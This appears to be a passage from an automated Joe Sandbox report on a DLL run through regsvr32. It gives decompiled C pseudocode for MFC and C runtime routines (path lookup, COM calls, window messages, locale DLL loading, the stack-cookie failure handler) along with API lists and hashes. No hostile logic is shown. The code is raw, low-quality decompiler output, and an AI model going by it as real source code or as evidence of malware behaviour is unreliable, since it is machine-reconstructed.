                                                                                                                								L10:
                                                                                                                								L100013E3( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
                                                                                                                								goto L5;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					E1000A0B7(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
                                                                                                                					_push(_t74);
                                                                                                                					E100298FF( *((intOrPtr*)(_t98 - 0x18)));
                                                                                                                					L5:
                                                                                                                					_t50 = 0;
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
                                                                                                                				_pop(_t93);
                                                                                                                				_pop(_t96);
                                                                                                                				_pop(_t75);
                                                                                                                				return E1004763E(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10029949
                                                                                                                • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 1002998A
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • PathIsUNCA.SHLWAPI(?), ref: 100299D4
                                                                                                                • GetVolumeInformationA.KERNEL32 ref: 100299F2
                                                                                                                • CharUpperA.USER32 ref: 10029A19
                                                                                                                • FindFirstFileA.KERNEL32(?,00000000), ref: 10029A2A
                                                                                                                • FindClose.KERNEL32(00000000), ref: 10029A36
                                                                                                                • lstrlenA.KERNEL32(?), ref: 10029A4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4099955704-0
                                                                                                                • Opcode ID: 2d133f7dd53ca02f4223dfed3d7f5fa10658c056192f086980df752fbbd6fbd5
                                                                                                                • Instruction ID: e6d24a488800c45a0210c296e119790506c70d007043d79cd7281b13a7672738
                                                                                                                • Opcode Fuzzy Hash: 2d133f7dd53ca02f4223dfed3d7f5fa10658c056192f086980df752fbbd6fbd5
                                                                                                                • Instruction Fuzzy Hash: EB41FF7190024AABEB00DBB4DC85BFF77BCFF053A4F500128F925E2191EB30AA44CA61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E1000B79D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t89;
                                                                                                                				intOrPtr _t90;
                                                                                                                				signed int* _t95;
                                                                                                                				intOrPtr* _t96;
                                                                                                                				void* _t99;
                                                                                                                				void* _t110;
                                                                                                                				void* _t113;
                                                                                                                				intOrPtr* _t115;
                                                                                                                				intOrPtr* _t119;
                                                                                                                				WCHAR* _t125;
                                                                                                                				intOrPtr* _t132;
                                                                                                                				intOrPtr* _t137;
                                                                                                                				void* _t158;
                                                                                                                				signed int _t163;
                                                                                                                				void* _t165;
                                                                                                                				intOrPtr _t169;
                                                                                                                				intOrPtr* _t171;
                                                                                                                				WCHAR* _t175;
                                                                                                                				void* _t177;
                                                                                                                				void* _t178;
                                                                                                                
                                                                                                                				_t158 = __edx;
                                                                                                                				_push(0x48);
                                                                                                                				E100476B6(0x1008de4d, __ebx, __edi, __esi);
                                                                                                                				_t137 =  *((intOrPtr*)(_t177 + 8));
                                                                                                                				_t163 = 0;
                                                                                                                				 *((intOrPtr*)(_t177 - 0x2c)) =  *((intOrPtr*)(_t177 + 0xc));
                                                                                                                				 *(_t177 - 0x50) =  *(_t177 + 0x1c);
                                                                                                                				 *(_t177 - 0x28) = 0;
                                                                                                                				 *((intOrPtr*)(_t177 - 0x44)) = 0;
                                                                                                                				 *((intOrPtr*)(_t177 - 0x40)) = 0;
                                                                                                                				 *((intOrPtr*)(_t177 - 0x24)) = 0;
                                                                                                                				 *(_t177 - 0x38) = 0;
                                                                                                                				_t89 = L10020F57(__ecx, _t137, 0x100a488c);
                                                                                                                				 *((intOrPtr*)(_t177 - 0x48)) = _t89;
                                                                                                                				 *(_t177 - 0x3c) = 0 | _t89 != 0x00000000;
                                                                                                                				_t90 = L10020F57(_t89 != 0, _t137, 0x100a47fc);
                                                                                                                				_push(_t177 - 0x20);
                                                                                                                				 *((intOrPtr*)(_t177 - 0x4c)) = _t90;
                                                                                                                				_push(_t137);
                                                                                                                				if( *((intOrPtr*)( *_t137 + 0x3c))() != 0) {
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					_t163 = 0;
                                                                                                                				}
                                                                                                                				_t169 = 1;
                                                                                                                				 *((intOrPtr*)( *_t137 + 0x40))(_t137, 1, _t177 - 0x28);
                                                                                                                				if( *(_t177 - 0x3c) == _t163) {
                                                                                                                					__eflags =  *((intOrPtr*)(_t177 - 0x2c)) - _t163;
                                                                                                                					if( *((intOrPtr*)(_t177 - 0x2c)) == _t163) {
                                                                                                                						_t113 =  *((intOrPtr*)( *_t137 + 0x20))(_t137, 4, 3, _t177 - 0x44);
                                                                                                                						__eflags = _t113;
                                                                                                                						if(_t113 == 0) {
                                                                                                                							__imp__CreateBindCtx(_t163, _t177 - 0x40);
                                                                                                                							_t115 =  *((intOrPtr*)(_t177 - 0x44));
                                                                                                                							 *((intOrPtr*)( *_t115 + 0x50))(_t115,  *((intOrPtr*)(_t177 - 0x40)), _t163, _t177 - 0x2c);
                                                                                                                							L10020F7B(_t177 - 0x40);
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t185 =  *(_t177 - 0x28) - _t163;
                                                                                                                					if( *(_t177 - 0x28) != _t163) {
                                                                                                                						L1000AD75(_t177 - 0x24, E100184C0());
                                                                                                                						 *(_t177 - 4) = _t163;
                                                                                                                						E1000B503(_t177 - 0x24, 0xf094);
                                                                                                                						_t173 =  *((intOrPtr*)( *((intOrPtr*)(_t177 - 0x24)) - 0xc)) + lstrlenW( *(_t177 - 0x28)) + 1;
                                                                                                                						_t125 = E1000A7A4( *((intOrPtr*)(_t177 - 0x24)), _t185,  *((intOrPtr*)( *((intOrPtr*)(_t177 - 0x24)) - 0xc)) + lstrlenW( *(_t177 - 0x28)) + 1, 2);
                                                                                                                						_t186 = _t125 - _t163;
                                                                                                                						 *(_t177 - 0x3c) = _t125;
                                                                                                                						if(_t125 != _t163) {
                                                                                                                							 *(_t177 - 0x54) =  *(E10049097(_t186));
                                                                                                                							 *(E10049097(_t186)) = _t163;
                                                                                                                							_t175 =  *(_t177 - 0x3c);
                                                                                                                							L10048F79(_t175, _t173, _t173 - 1,  *((intOrPtr*)(_t177 - 0x24)),  *(_t177 - 0x28));
                                                                                                                							_t178 = _t178 + 0x14;
                                                                                                                							_t132 = E10049097(_t186);
                                                                                                                							_t187 =  *_t132 - _t163;
                                                                                                                							if( *_t132 == _t163) {
                                                                                                                								 *(E10049097(__eflags)) =  *(_t177 - 0x54);
                                                                                                                							} else {
                                                                                                                								E1000AD19( *((intOrPtr*)(E10049097(_t187))));
                                                                                                                							}
                                                                                                                							__imp__CoTaskMemFree( *(_t177 - 0x28));
                                                                                                                							 *(_t177 - 0x28) = _t175;
                                                                                                                						}
                                                                                                                						 *(_t177 - 4) =  *(_t177 - 4) | 0xffffffff;
                                                                                                                						L100013E3( *((intOrPtr*)(_t177 - 0x24)) + 0xfffffff0, _t158);
                                                                                                                						_t169 = 1;
                                                                                                                					}
                                                                                                                					_t119 =  *((intOrPtr*)(_t177 - 0x48));
                                                                                                                					 *((intOrPtr*)( *_t119 + 0x20))(_t119, _t177 - 0x2c);
                                                                                                                					L14:
                                                                                                                					 *((intOrPtr*)(_t177 - 0x24)) = _t169;
                                                                                                                				}
                                                                                                                				_t95 =  *(_t177 - 0x50);
                                                                                                                				if(_t95 == _t163) {
                                                                                                                					_t96 =  *((intOrPtr*)(_t177 - 0x4c));
                                                                                                                					__eflags = _t96 - _t163;
                                                                                                                					if(_t96 == _t163) {
                                                                                                                						L19:
                                                                                                                						 *(_t177 - 0x34) = _t163;
                                                                                                                						 *(_t177 - 0x30) = _t163;
                                                                                                                					} else {
                                                                                                                						_t110 =  *((intOrPtr*)( *_t96 + 0x24))(_t96,  *((intOrPtr*)(_t177 + 0x10)), 0xffffffff, _t163, _t177 - 0x34);
                                                                                                                						__eflags = _t110;
                                                                                                                						if(_t110 != 0) {
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					 *(_t177 - 0x34) =  *_t95;
                                                                                                                					 *(_t177 - 0x30) = _t95[1];
                                                                                                                				}
                                                                                                                				_push(_t177 - 0x38);
                                                                                                                				_push( *((intOrPtr*)(_t177 + 0x10)));
                                                                                                                				_push(_t137);
                                                                                                                				if( *((intOrPtr*)( *_t137 + 0x58))() != 0) {
                                                                                                                					 *(_t177 - 0x38) = _t163;
                                                                                                                				}
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				asm("movsd");
                                                                                                                				_t99 = E1000AA09();
                                                                                                                				_t171 = __imp__CoTaskMemFree;
                                                                                                                				_t165 = _t99;
                                                                                                                				 *_t171( *(_t177 - 0x28),  *((intOrPtr*)(_t177 + 0x10)),  *(_t177 - 0x34),  *(_t177 - 0x30),  *((intOrPtr*)(_t177 + 0x14)),  *((intOrPtr*)(_t177 + 0x18)),  *(_t177 - 0x38),  *(_t177 - 0x28),  *((intOrPtr*)(_t177 - 0x2c)));
                                                                                                                				if( *((intOrPtr*)(_t177 - 0x24)) != 0) {
                                                                                                                					 *_t171( *((intOrPtr*)(_t177 - 0x2c)));
                                                                                                                				}
                                                                                                                				L10020F7B(_t177 - 0x44);
                                                                                                                				L10020F7B(_t177 - 0x48);
                                                                                                                				L10020F7B(_t177 - 0x4c);
                                                                                                                				return E10047739(_t137, _t165, _t171);
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000B7A4
                                                                                                                • lstrlenW.KERNEL32(?,0000F094,00000000), ref: 1000B84C
                                                                                                                • __snprintf_s.LIBCMT ref: 1000B88D
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000B8BA
                                                                                                                  • Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097
                                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 1000B900
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000B9A0
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000B9AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeTask$BindCreateH_prolog3___getptd_noexit__snprintf_slstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2341559186-0
                                                                                                                • Opcode ID: c1dee482e81fc3de72b0be31839e8261954ebef90ab5afc6c2a4624c5598f9ac
                                                                                                                • Instruction ID: 731885473514ceb126aa7af1581c9c99ad427e6226d60a221b743c0619bdfa44
                                                                                                                • Opcode Fuzzy Hash: c1dee482e81fc3de72b0be31839e8261954ebef90ab5afc6c2a4624c5598f9ac
                                                                                                                • Instruction Fuzzy Hash: 607122B5D00619EFDF11DFE4C8849EEBBBAFF89350B24415AF501AB265DB31A901CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E100368ED(void* __ecx, signed int _a4, long _a8) {
                                                                                                                				struct HWND__* _v8;
                                                                                                                				signed short _t23;
                                                                                                                				signed short _t24;
                                                                                                                				long _t25;
                                                                                                                				void* _t30;
                                                                                                                				int _t33;
                                                                                                                				struct HWND__* _t37;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t30 = __ecx;
                                                                                                                				if(GetKeyState(0x11) < 0) {
                                                                                                                					_push(8);
                                                                                                                					_pop(0);
                                                                                                                				}
                                                                                                                				_t23 = 0;
                                                                                                                				if(GetKeyState(0x10) < 0) {
                                                                                                                					_push(4);
                                                                                                                					_pop(0);
                                                                                                                				}
                                                                                                                				_t24 = _t23;
                                                                                                                				_t37 = GetFocus();
                                                                                                                				_v8 = GetDesktopWindow();
                                                                                                                				if(_t37 != 0) {
                                                                                                                					_t33 = _a4 << 0x00000010 | _t24 & 0x0000ffff;
                                                                                                                					do {
                                                                                                                						_t25 = SendMessageA(_t37, 0x20a, _t33, _a8);
                                                                                                                						_t37 = GetParent(_t37);
                                                                                                                					} while (_t25 == 0 && _t37 != 0 && _t37 != _v8);
                                                                                                                				} else {
                                                                                                                					_t25 = SendMessageA( *(_t30 + 0x20), 0x20a, _a4 << 0x00000010 | _t24 & 0x0000ffff, _a8);
                                                                                                                				}
                                                                                                                				return _t25;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendState$DesktopFocusParentWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4150626516-0
                                                                                                                • Opcode ID: 9a934e56d06f8420ced08b3f003bf898e20424dbf1ab2368cb9cd4e11e2626cd
                                                                                                                • Instruction ID: b08179133bad728bd0a424a8e609a40b3bccbb61917cf79b6a10bb47f5793f4b
                                                                                                                • Opcode Fuzzy Hash: 9a934e56d06f8420ced08b3f003bf898e20424dbf1ab2368cb9cd4e11e2626cd
                                                                                                                • Instruction Fuzzy Hash: 36112732A00325BFEB115BA48C88BA9379CEB4D7A2F118513FE41DF141D6B0CD015AA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E10006B1C(void* __ecx, void* __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				int _v88;
                                                                                                                				char _v92;
                                                                                                                				struct tagRECT _v108;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t16;
                                                                                                                				int _t18;
                                                                                                                				void* _t19;
                                                                                                                				int _t23;
                                                                                                                				int _t24;
                                                                                                                				void* _t40;
                                                                                                                				void* _t48;
                                                                                                                				void* _t49;
                                                                                                                				void* _t52;
                                                                                                                				signed int _t53;
                                                                                                                
                                                                                                                				_t48 = __edx;
                                                                                                                				_t16 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t16 ^ _t53;
                                                                                                                				_t52 = __ecx;
                                                                                                                				_t18 = IsIconic( *(__ecx + 0x20));
                                                                                                                				_t54 = _t18;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					_t19 = E1001B653(_t40, _t52, _t49, _t52, __eflags);
                                                                                                                				} else {
                                                                                                                					_push(_t40);
                                                                                                                					L1000CE8D(_t40,  &_v92, _t49, _t52, _t54);
                                                                                                                					SendMessageA( *(_t52 + 0x20), 0x27, _v88, 0);
                                                                                                                					_t23 = GetSystemMetrics(0xb);
                                                                                                                					_t24 = GetSystemMetrics(0xc);
                                                                                                                					GetClientRect( *(_t52 + 0x20),  &_v108);
                                                                                                                					asm("cdq");
                                                                                                                					asm("cdq");
                                                                                                                					DrawIcon(_v88, _v108.right - _v108.left - _t23 + 1 - _t48 >> 1, _v108.bottom - _v108.top - _t24 + 1 - _t48 >> 1,  *(_t52 + 0x358));
                                                                                                                					_t19 = L1000CEE1(_t23,  &_v92, _t24, _t52, _t54);
                                                                                                                					_t49 = _t52;
                                                                                                                					_t40 = _t49;
                                                                                                                				}
                                                                                                                				return E1004763E(_t19, _t40, _v8 ^ _t53, _t48, _t49, _t52);
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                • IsIconic.USER32(?), ref: 10006B32
                                                                                                                  • Part of subcall function 1000CE8D: __EH_prolog3.LIBCMT ref: 1000CE94
                                                                                                                  • Part of subcall function 1000CE8D: BeginPaint.USER32(?,?), ref: 1000CEC0
                                                                                                                • SendMessageA.USER32 ref: 10006B51
                                                                                                                • GetSystemMetrics.USER32 ref: 10006B5F
                                                                                                                • GetSystemMetrics.USER32 ref: 10006B65
                                                                                                                • GetClientRect.USER32 ref: 10006B70
                                                                                                                • DrawIcon.USER32(?,?,?,?), ref: 10006B9D
                                                                                                                  • Part of subcall function 1000CEE1: __EH_prolog3.LIBCMT ref: 1000CEE8
                                                                                                                  • Part of subcall function 1000CEE1: EndPaint.USER32(?,?), ref: 1000CF03
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2914073315-0
                                                                                                                • Opcode ID: 7d5ad367ec7e6a495c84de9b0edac7a3a2f02a05002302d057f86cc0702b2a17
                                                                                                                • Instruction ID: eb5c1bc0e7388b9b885b88b269adcdf260be08767f406dc6939caf251d828d49
                                                                                                                • Opcode Fuzzy Hash: 7d5ad367ec7e6a495c84de9b0edac7a3a2f02a05002302d057f86cc0702b2a17
                                                                                                                • Instruction Fuzzy Hash: 82115E316006199FEB00DFB8CE89EEEBBBAEF49740F140124E546EB1A4DE70AD05CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E10019571(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v284;
                                                                                                                				char _v288;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t9;
                                                                                                                				intOrPtr* _t18;
                                                                                                                				void* _t26;
                                                                                                                				void* _t27;
                                                                                                                				void* _t33;
                                                                                                                				signed int _t34;
                                                                                                                				void* _t35;
                                                                                                                				signed int _t36;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t33 = __edi;
                                                                                                                				_t32 = __edx;
                                                                                                                				_t28 = __ecx;
                                                                                                                				_t26 = __ebx;
                                                                                                                				_t9 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t9 ^ _t36;
                                                                                                                				_t39 = _a4 - 0x800;
                                                                                                                				_t35 = __ecx;
                                                                                                                				if(_a4 != 0x800) {
                                                                                                                					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
                                                                                                                					if(__eflags != 0) {
                                                                                                                						goto L2;
                                                                                                                					} else {
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push(E1004C6C3(__edx,  &_v288, 4, "LOC"));
                                                                                                                					L1000135C(__ebx, _t28, __edi, _t35);
                                                                                                                					_t37 = _t37 + 0x10;
                                                                                                                					L2:
                                                                                                                					_push(_t26);
                                                                                                                					_push(_t33);
                                                                                                                					_t34 =  *(E10049097(_t39));
                                                                                                                					 *(E10049097(_t39)) =  *_t14 & 0x00000000;
                                                                                                                					_t35 = 0x112;
                                                                                                                					_t27 = E1004C1D3( &_v284, 0x112, 0x111, 0x112,  &_v288);
                                                                                                                					_t18 = E10049097(_t39);
                                                                                                                					_t40 =  *_t18;
                                                                                                                					if( *_t18 == 0) {
                                                                                                                						 *(E10049097(__eflags)) = _t34;
                                                                                                                					} else {
                                                                                                                						E1000AD19( *((intOrPtr*)(E10049097(_t40))));
                                                                                                                					}
                                                                                                                					if(_t27 == 0xffffffff || _t27 >= _t35) {
                                                                                                                						_t12 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					} else {
                                                                                                                						_t12 = LoadLibraryA( &_v284);
                                                                                                                					}
                                                                                                                					_pop(_t33);
                                                                                                                					_pop(_t26);
                                                                                                                				}
                                                                                                                				return E1004763E(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                                			}

















                                                                                                                0x1001962f
                                                                                                                0x10019630
                                                                                                                0x10019630
                                                                                                                0x1001963d

                                                                                                                APIs
                                                                                                                • _strcpy_s.LIBCMT ref: 1001959E
                                                                                                                  • Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097
                                                                                                                • __snprintf_s.LIBCMT ref: 100195D7
                                                                                                                  • Part of subcall function 1004C1D3: __vsnprintf_s_l.LIBCMT ref: 1004C1E8
                                                                                                                • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10019602
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 10019625
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                • String ID: LOC
                                                                                                                • API String ID: 3864805678-519433814
                                                                                                                • Opcode ID: 6594c7518ffc80edd72be3ad7d85f5af8eab506f016d828ffb66156ef1f4dc22
                                                                                                                • Instruction ID: 212530b40b3413e9381a31f2f5a97131ffea2fc55ce2f64732fe8a4d9ea1e514
                                                                                                                • Opcode Fuzzy Hash: 6594c7518ffc80edd72be3ad7d85f5af8eab506f016d828ffb66156ef1f4dc22
                                                                                                                • Instruction Fuzzy Hash: 6111D3B5900218AEDB11DB70CC86BDD37ACEF01355F2100B1F605EB092DA74EA858BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E1004763E(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                				intOrPtr _v0;
                                                                                                                				void* _v804;
                                                                                                                				intOrPtr _v808;
                                                                                                                				intOrPtr _v812;
                                                                                                                				intOrPtr _t6;
                                                                                                                				intOrPtr _t11;
                                                                                                                				intOrPtr _t12;
                                                                                                                				intOrPtr _t13;
                                                                                                                				long _t17;
                                                                                                                				intOrPtr _t21;
                                                                                                                				intOrPtr _t22;
                                                                                                                				intOrPtr _t25;
                                                                                                                				intOrPtr _t26;
                                                                                                                				intOrPtr _t27;
                                                                                                                				intOrPtr* _t31;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_t27 = __esi;
                                                                                                                				_t26 = __edi;
                                                                                                                				_t25 = __edx;
                                                                                                                				_t22 = __ecx;
                                                                                                                				_t21 = __ebx;
                                                                                                                				_t6 = __eax;
                                                                                                                				_t34 = _t22 -  *0x100b9e70; // 0xbb35530
                                                                                                                				if(_t34 == 0) {
                                                                                                                					asm("repe ret");
                                                                                                                				}
                                                                                                                				 *0x100be548 = _t6;
                                                                                                                				 *0x100be544 = _t22;
                                                                                                                				 *0x100be540 = _t25;
                                                                                                                				 *0x100be53c = _t21;
                                                                                                                				 *0x100be538 = _t27;
                                                                                                                				 *0x100be534 = _t26;
                                                                                                                				 *0x100be560 = ss;
                                                                                                                				 *0x100be554 = cs;
                                                                                                                				 *0x100be530 = ds;
                                                                                                                				 *0x100be52c = es;
                                                                                                                				 *0x100be528 = fs;
                                                                                                                				 *0x100be524 = gs;
                                                                                                                				asm("pushfd");
                                                                                                                				_pop( *0x100be558);
                                                                                                                				 *0x100be54c =  *_t31;
                                                                                                                				 *0x100be550 = _v0;
                                                                                                                				 *0x100be55c =  &_a4;
                                                                                                                				 *0x100be498 = 0x10001;
                                                                                                                				_t11 =  *0x100be550; // 0x0
                                                                                                                				 *0x100be44c = _t11;
                                                                                                                				 *0x100be440 = 0xc0000409;
                                                                                                                				 *0x100be444 = 1;
                                                                                                                				_t12 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v812 = _t12;
                                                                                                                				_t13 =  *0x100b9e74; // 0xf44caacf
                                                                                                                				_v808 = _t13;
                                                                                                                				 *0x100be490 = IsDebuggerPresent();
                                                                                                                				_push(1);
                                                                                                                				E10062721(_t14);
                                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                                				_t17 = UnhandledExceptionFilter(0x100a12d8);
                                                                                                                				if( *0x100be490 == 0) {
                                                                                                                					_push(1);
                                                                                                                					E10062721(_t17);
                                                                                                                				}
                                                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                			}




















                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 10051B95
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 10051BAA
                                                                                                                • UnhandledExceptionFilter.KERNEL32(100A12D8), ref: 10051BB5
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 10051BD1
                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 10051BD8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2579439406-0
                                                                                                                • Opcode ID: 500806440b6f5c9c282f01871ea2c3057755e7dcf7f599cfed5551d0f8a355ac
                                                                                                                • Instruction ID: e741ea3e61d09aa0f8a454da4e742f38b60909009e684e33022972ac0ce8d015
                                                                                                                • Opcode Fuzzy Hash: 500806440b6f5c9c282f01871ea2c3057755e7dcf7f599cfed5551d0f8a355ac
                                                                                                                • Instruction Fuzzy Hash: F121BCBC401AA4DFF320DF68D9C56C43BB0FB09348F50565AE90A922A1E7B46D858F16
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
